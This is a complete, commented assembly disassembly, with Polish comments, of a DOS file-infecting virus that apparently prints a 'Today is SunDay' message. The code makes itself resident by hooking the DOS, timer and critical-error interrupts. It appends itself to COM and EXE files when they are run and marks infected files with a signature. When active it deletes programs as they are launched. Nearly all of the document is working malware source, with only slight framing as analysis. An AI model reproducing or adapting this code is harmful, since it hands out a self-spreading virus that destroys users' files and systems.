; rozpoznaje wg nazwy (co nie COM = EXE)
;-------
; aktywacja w niedziele roku roznego od 1989
; procedury niszczacej
;-------
; doniesienia co 30 minut
; ale nigdy nie wlaczone
;-------
; Nie zaraza COMMAND.COM'a
;-------
LF EQU 0AH
CR EQU 0DH
;INITIAL VALUES : CS:IP 0918:00C4
; SS:SP 0918:065D
;----------------
; <- tutaj cialo programu
;----------------
S9180 SEGMENT STACK
ASSUME DS:S9180, SS:S9180 ,CS:S9180 ,ES:S9180
L9180: jmp L0095 ;L9215 ;9180 E9 92 00
db 73h,55h ;'sU' ;9183 73 55
;<- wzorzec sygnatury zarazenia
L0005 DB 0C8H,0F7h,0E1h,0EEh,0E7h ;9185 C8 F7 E1 EE E7
L000A dw 100h ;IP nosiciela COM ;918A 00 01
L000C dw 1905h ;CS nosiciela COM ;918C 05 19
L000E db 0 ;ptr aktywnosci wirusa ;918E 00
L000F dw 0 ;918F 00 00
L0011 dw 9374h ;dlugosc programu oryginalna ;9191 74 93
L0013 dw 0FEA5h ;old int 8 ;9193 A5
L0015 dw 0F000h ;9195 00
L0017 dw 1460h ;old int 21h ;9197 60 14
L0019 dw 025Bh ;9199 5B 02
L001B dw 0556h ;old int 24h ;919B 56 05
L001D dw 0BA6h ;919D A6 0B
L001F dw 32400 ;30 minut zwloki ;919F 90 7E
dw 0 ;91A1 00 00
dw 0 ;91A3 00 00
dw 0 ;91A5 00 00
dw 0 ;91A7 00 00
dw 0 ;91A9 00 00
dw 0 ;91AB 00 00
dw 0E800h ;91AD 00 E8
dw 5F06h ;91AF 06 5F
L0031 dw 0C89h ;adres bloku wirusa ;91B1 89 0C
L0033 dw 80h ;wielkosc bloku wirusa (para) ;91B3 80 00
;<----- Parameter Block
L0035 dw 0 ;Environment ;91B5 00 00
dw 80h ;<- command line ;91B7 80 00
L0039 dw 0C89h ; Segment ;91B9 89 0C
dw 5Ch ;<- FCB-1 ;91BB 5C 00
L003D dw 0C89h ; Segment ;91BD 89 0C
dw 6Ch ;<- FCB-2 ;91BF 6C 00
L0041 dw 0C89h ; Segment ;91C1 89 0C
L0043 dw 0800h ;SP nosiciela ;91C3 00 08
L0045 dw 0A58h ;rel segment stosu nosiciela ;91C5 58 0A
L0047 dw 3D73h ;IP nosiciela ;91C7 73 3D
L0049 dw 0 ;CS nosiciela (rel) ;91C9 00 00
;pierwsze 3 bajty wektora int ff
L004B dw 0F000h ;91CB 00 F0
L004D db 46h ;91CD 46
L004E db 1 ;0=COM, 1=EXE ;91CE 01
;<- bufor na poczatek zbioru
L004F db 'MZ' ;91CF 4D 5A
L0051 dw 01E4h ;last page bytes ;91D1 E4 01
L0053 dw 004Dh ;file size - pages ;91D3 4D 00
dw 0004h ;91D5 04 00
L0057 dw 0020h ;header size (para) ;91D7 20 00
dw 01C1h ;91D9 C1 01
dw 0FFFFh ;91DB FF FF
L005D dw 0918h ;SS ;91DD 18 09
L005F dw 065Dh ;SP ;91DF 5D 06
L0061 dw 1984h ;suma kontrolna ;91E1 84 19
L0063 dw 00C4h ;IP ;91E3 C4 00
L0065 dw 0918h ;CS ;91E5 18 09
dw 001Eh ;91E7 1E 00
dw 0000h ;91E9 00 00
;<- bufor na 5 ostatnich bajtow zbioru
L006B db 0Ah,0,0FFh,0FFh,0FFh ;91EB 0A 00 FF FF FF
L0070 dw 5 ;File handle ;91F0 05 00
L0072 dw 20h ;atrybut zarazanego zbioru ;91F2 20 00
L0074 dw 1031h ;91F4 31 10
L0076 dw 0A337h ;91F6 37 A3
L0078 dw 200h ;bytes/sector(page) ;91F8 00 02
L007A dw 10h ;bytes/paragraph ;91FA 10 00
L007C dw 9380h ;nowa dlugosc zbioru DWORD ;91FC 80 93
L007E dw 0 ;91FD 00 00
L0080 dw 41B9h ;path nazwy programu - offset ;9200 B9 41
L0082 dw 9B2Ah ; - segment ;9202 2A 9B
L0084 db 'COMMAND.COM' ;9294 43 4F 4D 4D 41 4E 44 2E 43 4F 4D
L008F dw 0,0,0 ;929F 00 00 00 00 00 00
;================================================
; <- Start wirusa zbiorow COM
;------------------------------------------------
L0095: CLD ;9215 FC
MOV AH,0FFH ;kontrola rezydowania ;9216 B4 FF
INT 21H ;9218 CD 21
CMP AH,0FFH ;921A 80 FC FF
JNB L9234 ;-> nie rezyduje ;921D 73 15
CMP AH,4 ;921F 80 FC 04
JB L9234 ;-> nie rezyduje ;9222 72 10
;<- wirus juz rezyduje
MOV AH,0DDH ;uruchom program ;9224 B4 DD
MOV DI,100h ;miejsce docelowe programu ;9226 BF 00 01
MOV SI,OFFSET L065F ;9229 BE 5F 06
ADD SI,DI ;miejsce aktualne programu ;922C 03 F7
MOV CX,CS:[DI+11H] ;dlugosc programu oryginalna ;922E 2E 8B 4D 11
INT 21H ;9232 CD 21
L9234: MOV AX,CS ;normalizacja segmentu ;9234 8C C8
ADD AX,10h ;9236 05 10 00
MOV SS,AX ;9239 8E D0
MOV SP,OFFSET L065D ;923B BC 5D 06
PUSH AX ;segment ;923E 50
MOV AX,OFFSET L00C4 ;=L9244 ;923F B8 C4 00
PUSH AX ;offset ;9242 50
RETF ;9243 CB
;================================================
; <- Start wirusa zbioru EXE
;------------------------------------------------
L00C4:
L9244: CLD ;9244 FC
PUSH ES ;<- PSP ;9245 06
MOV CS:L0031,ES ;9246 2E 8C 06 31 00
MOV CS:L0039,ES ;924B 2E 8C 06 39 00
MOV CS:L003D,ES ;9250 2E 8C 06 3D 00
MOV CS:L0041,ES ;9255 2E 8C 06 41 00
MOV AX,ES ;segment poczatku pgm ;925A 8C C0
ADD AX,10h ;925C 05 10 00
ADD CS:L0049,AX ;relokowanie CS ;925F 2E 01 06 49 00
ADD CS:L0045,AX ;relokowanie SS ;9264 2E 01 06 45 00
MOV AH,0FFH ;czy juz rezyduje ? ;9269 B4 FF
INT 21H ;926B CD 21
CMP AH,4 ;926D 80 FC 04
JNZ L9282 ;-> jeszcze nie ;9270 75 10
POP ES ;<- uruchomienie pgm ;9272 07
MOV SS,CS:L0045 ;inicjacja stosu ;9273 2E 8E 16 45 00
MOV SP,CS:L0043 ;9278 2E 8B 26 43 00
JMP DWORD PTR CS:L0047 ;uruchomienie nosiciela ;927D 2E FF 2E 47 00
;<- zarezydowanie
L9282: XOR AX,AX ;9282 33 C0
MOV ES,AX ;9284 8E C0
MOV BX,03FCh ;int 0ffh ;9286 BB FC 03
MOV AX,ES:[BX] ;9289 26 8B 07
MOV CS:L004B,AX ;928C 2E A3 4B 00
MOV AL,ES:[BX+2] ;9290 26 8A 47 02
MOV CS:L004D,AL ;9294 2E A2 4D 00
MOV WORD PTR ES:[BX],0A5F3h ;rep movsw ;9298 26 C7 07 F3 A5
MOV BYTE PTR ES:[BX+2],0CBH ;ret ;929D 26 C6 47 02 CB
POP AX ;92A2 58
ADD AX,10h ;92A3 05 10 00
MOV ES,AX ;92A6 8E C0
PUSH CS ;92A8 0E
POP DS ;92A9 1F
MOV CX,OFFSET L065F ;dl. wir. bez podpisu ;92AA B9 5F 06
SHR CX,1 ;na slowa ;92AD D1 E9
XOR SI,SI ;offset zrodlowy ;92AF 33 F6
MOV DI,SI ;offset wynikowy ;92B1 8B FE
PUSH ES ;segment przepisanego ;92B3 06
MOV AX,OFFSET L013C ;offset kontynuacji ;92B4 B8 3C 01
PUSH AX ;92B7 50
JMP DWORD PTR L05F6 ;skok w wektor int FF ;92B8 FF 2E F6 05
;<- kontynuacja na nowym miejscu
L013C: MOV AX,CS ;92BC 8C C8
MOV SS,AX ;92BE 8E D0
MOV SP,OFFSET L065D ;92C0 BC 5D 06
XOR AX,AX ;92C3 33 C0
MOV DS,AX ;92C5 8E D8
MOV AX,CS:L004B ;odtworzenie wektora int ff ;92C7 2E A1 4B 00
MOV [BX],AX ;92CB 89 07
MOV AL,CS:L004D ;92CD 2E A0 4D 00
MOV [BX+2],AL ;92D1 88 47 02
MOV BX,SP ;sp -> paragraf ;92D4 8B DC
MOV CL,4 ;92D6 B1 04
SHR BX,CL ;92D8 D3 EB
ADD BX,20h ;+512 ;92DA 83 C3 20
and bx,0fff0h ;92DD 83 E3 F0
MOV CS:L0033,BX ;paragrafy bloku potrzebne ;92E0 2E 89 1E 33 00
MOV AH,4AH ;Set Block ;92E5 B4 4A
MOV ES,CS:L0031 ;segment bloku ;92E7 2E 8E 06 31 00
INT 21H ;92EC CD 21
MOV AX,3521h ;Get int 21h ;92EE B8 21 35
INT 21H ;92F1 CD 21
MOV CS:L0017,BX ;92F3 2E 89 1E 17 00
MOV CS:L0019,ES ;92F8 2E 8C 06 19 00
PUSH CS ;92FD 0E
POP DS ;92FE 1F
MOV DX,OFFSET L02D2 ;92FF BA D2 02
MOV AX,2521h ;Set int 21h ;9302 B8 21 25
INT 21H ;9305 CD 21
MOV ES,[L0031] ;segment wirusa ;9307 8E 06 31 00
MOV ES,ES:[2Ch] ;environment ;930B 26 8E 06 2C 00
XOR DI,DI ;szukamy nazwy nosiciela ;9310 33 FF
MOV CX,7FFFh ;9312 B9 FF 7F
XOR AL,AL ;9315 32 C0
L9317: REPNZ SCASB ;9317 F2 AE
CMP ES:[DI],AL ;9319 26 38 05
LOOPNZ L9317 ;931C E0 F9
MOV DX,DI ;pathname offset ;931E 8B D7
ADD DX,3 ;9320 83 C2 03
MOV AX,4B00h ;Load & Execute nosiciela ;9323 B8 00 4B
PUSH ES ;9326 06
POP DS ;pathname segment ;9327 1F
PUSH CS ;9328 0E
POP ES ;parameter block ;9329 07
MOV BX,OFFSET L0035 ;parameter block ;932A BB 35 00
PUSH DS ;932D 1E
PUSH ES ;932E 06
PUSH AX ;932F 50
PUSH BX ;9330 53
PUSH CX ;9331 51
PUSH DX ;9332 52
MOV AH,2AH ;Get Date ;9333 B4 2A
INT 21H ;9335 CD 21
MOV BYTE PTR CS:L000E,0 ;ptr aktywnosci wirusa ;9337 2E C6 06 0E 00 00
CMP CX,1989 ;rok ;933D 81 F9 C5 07
JZ L936F ;-> tak ;9341 74 2C
; Mistake! Range for AL is 0 ..6 !
CMP AL,7 ;niedziela ? ;9343 3C 07
JNZ L9350 ;-> nie ;9345 75 09
INC BYTE PTR CS:L000E ;ptr aktywnosci wirusa ;9347 2E FE 06 0E 00
JMP SHORT L936F ;934C EB 21
NOP ;934E 90
NOP ;934F 90
;<- to nie niedziela i rok nie 1989
L9350: MOV AX,3508h ;Get int 8 ;9350 B8 08 35
INT 21H ;9353 CD 21
MOV CS:L0013,BX ;9355 2E 89 1E 13 00
MOV CS:L0015,ES ;935A 2E 8C 06 15 00
PUSH CS ;935F 0E
POP DS ;9360 1F
MOV WORD PTR L001F,32400 ;30 minut ;9361 C7 06 1F 00 90 7E
MOV AX,2508h ;Set int 8 ;9367 B8 08 25
MOV DX,OFFSET L0216 ;936A BA 16 02
INT 21H ;936D CD 21
L936F: POP DX ;936F 5A
POP CX ;9370 59
POP BX ;9371 5B
POP AX ;9372 58
POP ES ;9373 07
POP DS ;9374 1F
PUSHF ;9375 9C
CALL DWORD PTR CS:L0017 ;old int 21h (run) ;9376 2E FF 1E 17 00
PUSH DS ;937B 1E
POP ES ;937C 07
MOV AH,49H ;Free allocated memory ;937D B4 49
INT 21H ;937F CD 21
MOV AH,4DH ;Get Return code of child proc ;9381 B4 4D
INT 21H ;9383 CD 21
MOV AH,31H ;Keep process ;9385 B4 31
MOV DX,OFFSET L065F ;adres konca ;9387 BA 5F 06
MOV CL,4 ;na paragrafy ;938A B1 04
SHR DX,CL ;938C D3 EA
ADD DX,10h ;zaokraglenie ;938E 83 C2 10
INT 21H ;9391 CD 21
;-----------------------------------------------
; Wlasna obsluga int 24h
;-----------------------------------------------
L0213: XOR AX,AX ;9393 33 C0
IRET ;9395 CF
;================================================================
; Nowa obsluga int 8
;----------------------------------------------------------------
L0216: CMP BYTE PTR CS:L000E,1 ;ptr aktywnosci wirusa ;9396 2E 80 3E 0E 00 01
JNZ L93CC ;-> to nie sobota ;939C 75 2E
CMP WORD PTR CS:L001F,0 ;939E 2E 83 3E 1F 00 00
JNZ L93C7 ;-> jeszcze mamy czas ;93A4 75 21
PUSH AX ;93A6 50
PUSH BX ;93A7 53
PUSH SI ;93A8 56
MOV AH,0EH ; ;93A9 B4 0E
MOV BL,1FH ;atrybut ;93AB B3 1F
LEA SI,L0251 ;'Today is SunDay...' ;93AD 8D 36 51 02
L93B1: MOV AL,CS:[SI] ;znak ;93B1 2E 8A 04
CMP AL,'$' ;koniec ? ;93B4 3C 24
JZ L93BD ;-> tak ;93B6 74 05
INT 10H ;93B8 CD 10
INC SI ;93BA 46
JMP SHORT L93B1 ;93BB EB F4
L93BD: MOV WORD PTR CS:L001F,32400 ;reset licznika na 30min;93BD 2E C7 06 1F 00 90 7E
POP SI ;93C4 5E
POP BX ;93C5 5B
POP AX ;93C6 58
L93C7: DEC WORD PTR CS:L001F ;licznik zwloki ;93C7 2E FF 0E 1F 00
L93CC: JMP DWORD PTR CS:L0013 ;oryginal int 8 ;93CC 2E FF 2E 13 00
L0251 DB 'Today is SunDay! Why do you work so hard?',LF,CR
DB 'All work and no play make you a dull boy!',LF,CR
DB "Come on ! Let's go out and have some fun!$"
;================================================================
; Nowa obsluga int 21h
;----------------------------------------------------------------
L02D2: PUSHF ;9452 9C
CMP AH,0FFH ;czy to pytanie o wirusa ? ;9453 80 FC FF
JNZ L945D ;-> nie ;9456 75 05
MOV AX,0400h ;sygnalizacja obecnosci ;9458 B8 00 04
POPF ;945B 9D
IRET ;945C CF
L945D: CMP AH,0DDH ;uruchomienie nosiciela COM ? ;945D 80 FC DD
JZ L9470 ;-> tak ;9460 74 0E
CMP AX,4B00h ;Load & Execute ? ;9462 3D 00 4B
JNZ L946A ;-> nie, przezroczystosc ;9465 75 03
JMP SHORT L949E ;-> tak ;9467 EB 35
NOP ;9469 90
L946A: POPF ;946A 9D
JMP DWORD PTR CS:L0017 ;old int 21h ;946B 2E FF 2E 17 00
L9470: POP AX ;<- 0DDh, uruchom nosiciela COM ;9470 58
POP AX ;9471 58
MOV AX,0100h ;IP ;9472 B8 00 01
MOV CS:L000A,AX ;9475 2E A3 0A 00
POP AX ;CS ;9479 58
MOV CS:L000C,AX ;947A 2E A3 0C 00
REPZ MOVSB ;przeslanie programu na wirusa ;947E F3 A4
POPF ;9480 9D
MOV AX,CS:L000F ;? ;9481 2E A1 0F 00
JMP DWORD PTR CS:L000A ;9485 2E FF 2E 0A 00
;<- uruchamianie programu w fazie aktywnosci
L948A: XOR CX,CX ;948A 33 C9
MOV AX,4301h ;Set file attributes ;948C B8 01 43
INT 21H ;948F CD 21
MOV AH,41H ;Delete Directory Entry ;9491 B4 41
INT 21H ;9493 CD 21
MOV AX,4B00h ;Load & Execute ;9495 B8 00 4B
POPF ;9498 9D
JMP DWORD PTR CS:L0017 ;old int 21h ;9499 2E FF 2E 17 00
;<- uruchamianie programu
L949E: CMP BYTE PTR CS:L000E,1 ;ptr aktywnosci wirusa ;949E 2E 80 3E 0E 00 01
JZ L948A ;-> aktywny ;94A4 74 E4
MOV WORD PTR CS:L0070,0FFFFh ;File handle ;94A6 2E C7 06 70 00 FF FF
MOV WORD PTR CS:L008F,0 ;94AD 2E C7 06 8F 00 00 00
MOV CS:L0080,DX ;path do programu ;94B4 2E 89 16 80 00
MOV CS:L0082,DS ;94B9 2E 8C 1E 82 00
PUSH AX ;94BE 50
PUSH BX ;94BF 53
PUSH CX ;94C0 51
PUSH DX ;94C1 52
PUSH SI ;94C2 56
PUSH DI ;94C3 57
PUSH DS ;94C4 1E
PUSH ES ;94C5 06
CLD ;94C6 FC
MOV DI,DX ;94C7 8B FA
XOR DL,DL ;aktualny drive ;94C9 32 D2
CMP BYTE PTR [DI+1],':' ;czy path z drive ? ;94CB 80 7D 01 3A
JNZ L94D6 ;-> nie, aktualny ;94CF 75 05
MOV DL,[DI] ;94D1 8A 15
AND DL,1FH ;na numer drive ;94D3 80 E2 1F
L94D6: MOV AH,36H ;Get Disk Free Space ;94D6 B4 36
INT 21H ;94D8 CD 21
CMP AX,0FFFFh ;94DA 3D FF FF
JNZ L94E2 ;-> drive number OK ;94DD 75 03
L94DF: JMP L9768 ;<- drive number invalid ;94DF E9 86 02
L94E2: MUL BX ;<sec per clus>*<avl clus> ;94E2 F7 E3
MUL CX ;*<bytes per sec> ;94E4 F7 E1
OR DX,DX ;94E6 0B D2
JNZ L94EF ;-> ponad 64 KB wolne ;94E8 75 05
CMP AX,OFFSET L065F ;=1631=dlugosc wirusa ;94EA 3D 5F 06
JB L94DF ;94ED 72 F0
L94EF: MOV DX,CS:L0080 ;path do programu ;94EF 2E 8B 16 80 00
PUSH DS ;94F4 1E
POP ES ;94F5 07
XOR AL,AL ;poszukiwanie konca ;94F6 32 C0
MOV CX,41h ;94F8 B9 41 00
REPNZ SCASB ;94FB F2 AE
MOV SI,CS:L0080 ;zamiana na duze litery ;94FD 2E 8B 36 80 00
L9502: MOV AL,[SI] ;9502 8A 04
OR AL,AL ;9504 0A C0
JZ L9516 ;9506 74 0E
CMP AL,61H ;'a' ;9508 3C 61
JB L9513 ;950A 72 07
CMP AL,7AH ;'z' ;950C 3C 7A
JA L9513 ;950E 77 03
SUB BYTE PTR [SI],20H ;' ' ;9510 80 2C 20
L9513: INC SI ;9513 46
JMP SHORT L9502 ;9514 EB EC
L9516: MOV CX,0Bh ;czy to command ? ;9516 B9 0B 00
SUB SI,CX ;9519 2B F1
MOV DI,OFFSET L0084 ;'command.com' ;951B BF 84 00
PUSH CS ;951E 0E
POP ES ;951F 07
MOV CX,0Bh ;9520 B9 0B 00
REPZ CMPSB ;9523 F3 A6
JNZ L952A ;-> nie ;9525 75 03
JMP L9768 ;-> tak, odpuszczamy ;9527 E9 3E 02
L952A: MOV AX,4300h ;Get File Attributes ;952A B8 00 43
INT 21H ;952D CD 21
JB L9536 ;952F 72 05
MOV CS:L0072,CX ;atrybut zarazanego zbioru ;9531 2E 89 0E 72 00
L9536: JB L955D ;9536 72 25
XOR AL,AL ;znacznik zbioru COM ;9538 32 C0
MOV CS:L004E,AL ;0=COM, 1=EXE ;953A 2E A2 4E 00
PUSH DS ;szukamy konca nazwy ;953E 1E
POP ES ;953F 07
MOV DI,DX ;9540 8B FA
MOV CX,41h ;9542 B9 41 00
REPNZ SCASB ;9545 F2 AE
CMP BYTE PTR [DI-2],4DH ;'M'-ostatnia litera ;9547 80 7D FE 4D
JZ L9558 ;-> tak, COM ;954B 74 0B
CMP BYTE PTR [DI-2],6DH ;'m' ;954D 80 7D FE 6D
JZ L9558 ;-> tak, com ;9551 74 05
INC BYTE PTR CS:L004E ;<- EXE ;9553 2E FE 06 4E 00
L9558: MOV AX,3D00h ;Open Handle ;9558 B8 00 3D
INT 21H ;955B CD 21
L955D: JB L95B9 ;955D 72 5A
MOV CS:L0070,AX ;File handle ;955F 2E A3 70 00
MOV BX,AX ;9563 8B D8
MOV AX,4202h ;Move file ptr EOF+offs ;9565 B8 02 42
MOV CX,0FFFFh ;-5 (piec ostatnich bajtow) ;9568 B9 FF FF
MOV DX,0FFFBh ;956B BA FB FF
INT 21H ;956E CD 21
JB L955D ;9570 72 EB
ADD AX,5 ;+5 bajtow sygnatury ;9572 05 05 00
MOV CS:L0011,AX ;dlugosc programu oryginalna ;9575 2E A3 11 00
MOV CX,5 ;dlugosc sygnatury ;9579 B9 05 00
MOV DX,OFFSET L006B ;bufor na sygnature ;957C BA 6B 00
MOV AX,CS ;957F 8C C8
MOV DS,AX ;9581 8E D8
MOV ES,AX ;9583 8E C0
MOV AH,3FH ;Read Handle ;9585 B4 3F
INT 21H ;9587 CD 21
MOV DI,DX ;przeczytana sygnatura ;9589 8B FA
MOV SI,OFFSET L0005 ;wzorzec sygnatury ;958B BE 05 00
REPZ CMPSB ;958E F3 A6
JNZ L9599 ;-> jeszcze nie zarazony ;9590 75 07
MOV AH,3EH ;Close Handle ;9592 B4 3E
INT 21H ;9594 CD 21
JMP L9768 ;9596 E9 CF 01
;<----- zarazanie zbioru
L9599: MOV AX,3524h ;Get int 24h ;9599 B8 24 35
INT 21H ;959C CD 21
MOV L001B,BX ;959E 89 1E 1B 00
MOV L001D,ES ;95A2 8C 06 1D 00
MOV DX,OFFSET L0213 ;L9393 ;95A6 BA 13 02
MOV AX,2524h ;Set int 24h ;95A9 B8 24 25
INT 21H ;95AC CD 21
LDS DX,DWORD PTR L0080 ;ptr na path ;95AE C5 16 80 00
XOR CX,CX ;95B2 33 C9
MOV AX,4301h ;Set File attributes ;95B4 B8 01 43
INT 21H ;95B7 CD 21
L95B9: JB L95F6 ;95B9 72 3B
MOV BX,CS:L0070 ;File handle ;95BB 2E 8B 1E 70 00
MOV AH,3EH ;Close Handle ;95C0 B4 3E
INT 21H ;95C2 CD 21
MOV WORD PTR CS:L0070,0FFFFh ;File handle ;95C4 2E C7 06 70 00 FF FF
MOV AX,3D02h ;Open Handle R/W ;95CB B8 02 3D
INT 21H ;95CE CD 21
JB L95F6 ;95D0 72 24
MOV CS:L0070,AX ;File handle ;95D2 2E A3 70 00
MOV AX,CS ;95D6 8C C8
MOV DS,AX ;95D8 8E D8
MOV ES,AX ;95DA 8E C0
MOV BX,L0070 ;File handle ;95DC 8B 1E 70 00
MOV AX,5700h ;Get File Date/Time ;95E0 B8 00 57
INT 21H ;95E3 CD 21
MOV L0074,DX ;95E5 89 16 74 00
MOV L0076,CX ;95E9 89 0E 76 00
MOV AX,4200h ;Move file ptr BOF+offs ;95ED B8 00 42
XOR CX,CX ;95F0 33 C9
MOV DX,CX ;95F2 8B D1
INT 21H ;95F4 CD 21
L95F6: JB L9636 ;95F6 72 3E
CMP BYTE PTR L004E,0 ;0=COM, 1=EXE ;95F8 80 3E 4E 00 00
JZ L9603 ;95FD 74 04
JMP SHORT L965C ;95FF EB 5B
NOP ;9601 90
NOP ;9602 90
;<----- Zarazenie COM'a
L9603: MOV BX,1000h ;zadanie 64KB bufora pamieci ;9603 BB 00 10
MOV AH,48H ;allocate memory ;9606 B4 48
INT 21H ;9608 CD 21
JNB L9617 ;-> powiodlo sie ;960A 73 0B
MOV AH,3EH ;Close Handle ;960C B4 3E
MOV BX,L0070 ;File handle ;960E 8B 1E 70 00
INT 21H ;9612 CD 21
JMP L9768 ;9614 E9 51 01
L9617: INC WORD PTR L008F ;9617 FF 06 8F 00
MOV ES,AX ;nowy blok pamieci ;961B 8E C0
XOR SI,SI ;961D 33 F6
MOV DI,SI ;961F 8B FE
MOV CX,OFFSET L065F ;9621 B9 5F 06
REPZ MOVSB ;przepisanie do bufora ;9624 F3 A4
MOV DX,DI ;pierwsze wolne miejsce ;9626 8B D7
MOV CX,L0011 ;dlugosc programu oryginalna ;9628 8B 0E 11 00
MOV BX,L0070 ;File handle ;962C 8B 1E 70 00
PUSH ES ;9630 06
POP DS ;9631 1F
MOV AH,3FH ;Read Handle ;9632 B4 3F
INT 21H ;9634 CD 21
L9636: JB L9657 ;9636 72 1F
ADD DI,CX ;na poczatek zbioru ;9638 03 F9
XOR CX,CX ;963A 33 C9
MOV DX,CX ;963C 8B D1
MOV AX,4200h ;Move file ptr BOF+offs ;963E B8 00 42
INT 21H ;9641 CD 21
MOV SI,OFFSET L0005 ;dopisanie ogonka ;9643 BE 05 00
MOV CX,5 ;9646 B9 05 00
PUSH DS ;9649 1E
PUSH CS ;964A 0E
POP DS ;964B 1F
REPZ MOVSB ;964C F3 A4
POP DS ;964E 1F
MOV CX,DI ;nowa dlugosc programu ;964F 8B CF
XOR DX,DX ;bufor z wynikowym programem ;9651 33 D2
MOV AH,40H ;Write Handle ;9653 B4 40
INT 21H ;9655 CD 21
L9657: JB L9666 ;9657 72 0D
JMP L9723 ;9659 E9 C7 00
;<----- Zarazenie EXE'ca
L965C: MOV CX,1Ch ;EXE file header - dlugosc ;965C B9 1C 00
MOV DX,OFFSET L004F ; - bufor ;965F BA 4F 00
MOV AH,3FH ;Read Handle ;9662 B4 3F
INT 21H ;9664 CD 21
L9666: JB L96B2 ;9666 72 4A
MOV WORD PTR L0061,1984h ;suma kontrolna ;9668 C7 06 61 00 84 19
MOV AX,L005D ;SS ;966E A1 5D 00
MOV L0045,AX ;9671 A3 45 00
MOV AX,L005F ;SP ;9674 A1 5F 00
MOV L0043,AX ;9677 A3 43 00
MOV AX,L0063 ;IP ;967A A1 63 00
MOV L0047,AX ;967D A3 47 00
MOV AX,L0065 ;CS ;9680 A1 65 00
MOV L0049,AX ;9683 A3 49 00
MOV AX,L0053 ;sile size - pages ;9686 A1 53 00
CMP WORD PTR L0051,0 ;last page bytes ;9689 83 3E 51 00 00
JZ L9691 ;968E 74 01
DEC AX ;9690 48
L9691: MUL WORD PTR L0078 ;* <bytes per page> ;9691 F7 26 78 00
ADD AX,L0051 ;+last page bytes ;9695 03 06 51 00
ADC DX,0 ;9699 83 D2 00
ADD AX,0Fh ;zaokraglenie ;969C 05 0F 00
ADC DX,0 ;969F 83 D2 00
AND AX,0FFF0h ;96A2 25 F0 FF
MOV L007C,AX ;96A5 A3 7C 00
MOV L007E,DX ;96A8 89 16 7E 00
ADD AX,OFFSET L0664 ;dlugosc z sygnatura ;96AC 05 64 06
ADC DX,0 ;96AF 83 D2 00
L96B2: JB L96EE ;96B2 72 3A
DIV WORD PTR L0078 ;bytes per page ;96B4 F7 36 78 00
OR DX,DX ;czy jest reszta ? ;96B8 0B D2
JZ L96BD ;-> nie ;96BA 74 01
INC AX ;<- jest reszta ;96BC 40
L96BD: MOV L0053,AX ;pages per file ;96BD A3 53 00
MOV L0051,DX ;last page bytes ;96C0 89 16 51 00
MOV AX,L007C ;nowa dlugosc calosci ;96C4 A1 7C 00
MOV DX,L007E ;96C7 8B 16 7E 00
DIV WORD PTR L007A ;na paragrafy ;96CB F7 36 7A 00
SUB AX,L0057 ;header size ;96CF 2B 06 57 00
MOV L0065,AX ;CS wirusa ;96D3 A3 65 00
MOV WORD PTR L0063,OFFSET L00C4 ;IP wirusa ;96D6 C7 06 63 00 C4 00
MOV L005D,AX ;SS wirusa ;96DC A3 5D 00
MOV WORD PTR L005F,OFFSET L065D ;SP wirusa ;96DF C7 06 5F 00 5D 06
XOR CX,CX ;96E5 33 C9
MOV DX,CX ;96E7 8B D1
MOV AX,4200h ;Move file ptr BOF+offs ;96E9 B8 00 42
INT 21H ;96EC CD 21
L96EE: JB L96FA ;96EE 72 0A
MOV CX,1Ch ;zapis zmodyf. headera ;96F0 B9 1C 00
MOV DX,OFFSET L004F ;96F3 BA 4F 00
MOV AH,40H ;write handle ;96F6 B4 40
INT 21H ;96F8 CD 21
L96FA: JB L970D ;96FA 72 11
CMP AX,CX ;96FC 3B C1
JNZ L9723 ;-> nie cale poszlo ;96FE 75 23
MOV DX,L007C ;nowa dlugosc zbioru ;9700 8B 16 7C 00
MOV CX,L007E ;9704 8B 0E 7E 00
MOV AX,4200h ;Move file ptr BOF+offs ;9708 B8 00 42
INT 21H ;970B CD 21
L970D: JB L9723 ;970D 72 14
XOR DX,DX ;970F 33 D2
MOV CX,065Fh ;9711 B9 5F 06
MOV AH,40H ;Write Handle ;9714 B4 40
INT 21H ;9716 CD 21
MOV CX,5 ;9718 B9 05 00
LEA DX,L0005 ;971B 8D 16 05 00
MOV AH,40H ;Write Handle ;971F B4 40
INT 21H ;9721 CD 21
;<----- wspolny koniec
L9723: CMP WORD PTR CS:L008F,0 ;znacznik zajecia bloku ;9723 2E 83 3E 8F 00 00
JZ L972F ;9729 74 04
MOV AH,49H ;Free allocated memory ;972B B4 49
INT 21H ;972D CD 21
L972F: CMP WORD PTR CS:L0070,-1 ;File handle ;972F 2E 83 3E 70 00 FF
JZ L9768 ;-> nie otwarty ;9735 74 31
MOV BX,CS:L0070 ;File handle ;9737 2E 8B 1E 70 00
MOV DX,CS:L0074 ;973C 2E 8B 16 74 00
MOV CX,CS:L0076 ;9741 2E 8B 0E 76 00
MOV AX,5701h ;Set File Time/Date ;9746 B8 01 57
INT 21H ;9749 CD 21
MOV AH,3EH ;Close Handle ;974B B4 3E
INT 21H ;974D CD 21
PUSH CS ;974F 0E
POP DS ;9750 1F
LDS DX,DWORD PTR L0080 ;ptr nazwy zbioru ;9751 C5 16 80 00
MOV CX,CS:L0072 ;atry zarazanego zbioru ;9755 2E 8B 0E 72 00
MOV AX,4301h ;Set File Attributes ;975A B8 01 43
INT 21H ;975D CD 21
LEA DX,L001B ;975F 8D 16 1B 00
MOV AX,2524h ;Set int 24h vector ;9763 B8 24 25
INT 21H ;9766 CD 21
L9768: POP ES ;9768 07
POP DS ;9769 1F
POP DI ;976A 5F
POP SI ;976B 5E
POP DX ;976C 5A
POP CX ;976D 59
POP BX ;976E 5B
POP AX ;976F 58
POPF ;9770 9D
JMP DWORD PTR CS:L0017 ;old int 21h ;9771 2E FF 2E 17 00
L05F6 dw 03FCh ;<- adres wektora int ff ;9776 FC 03
dw 0 ;9778 00 00
;<------ stos
db 0 ;977A 00
dw 0 ;977B 00 00
dw 0 ;977D 00 00
dw 0 ;977F 00 00
dw 0 ;9781 00 00
dw 0 ;9783 00 00
dw 0 ;9785 00 00
dw 0 ;9787 00 00
dw 0 ;9789 00 00
dw 0 ;978B 00 00
dw 0 ;978D 00 00
dw 0 ;978F 00 00
dw 0 ;9791 00 00
dw 0 ;9793 00 00
dw 0 ;9795 00 00
dw 0 ;9797 00 00
dw 0 ;9799 00 00
dw 0 ;979B 00 00
dw 0 ;979D 00 00
dw 0 ;979F 00 00
dw 0 ;97A1 00 00
dw 0 ;97A3 00 00
dw 0 ;97A5 00 00
dw 0 ;97A7 00 00
dw 156Ch ;97A9 6C 15
dw 1261h ;97AB 61 12
dw 2524h ;97AD 24 25
dw 0005h ;97AF 05 00
dw 0020h ;97B1 20 00
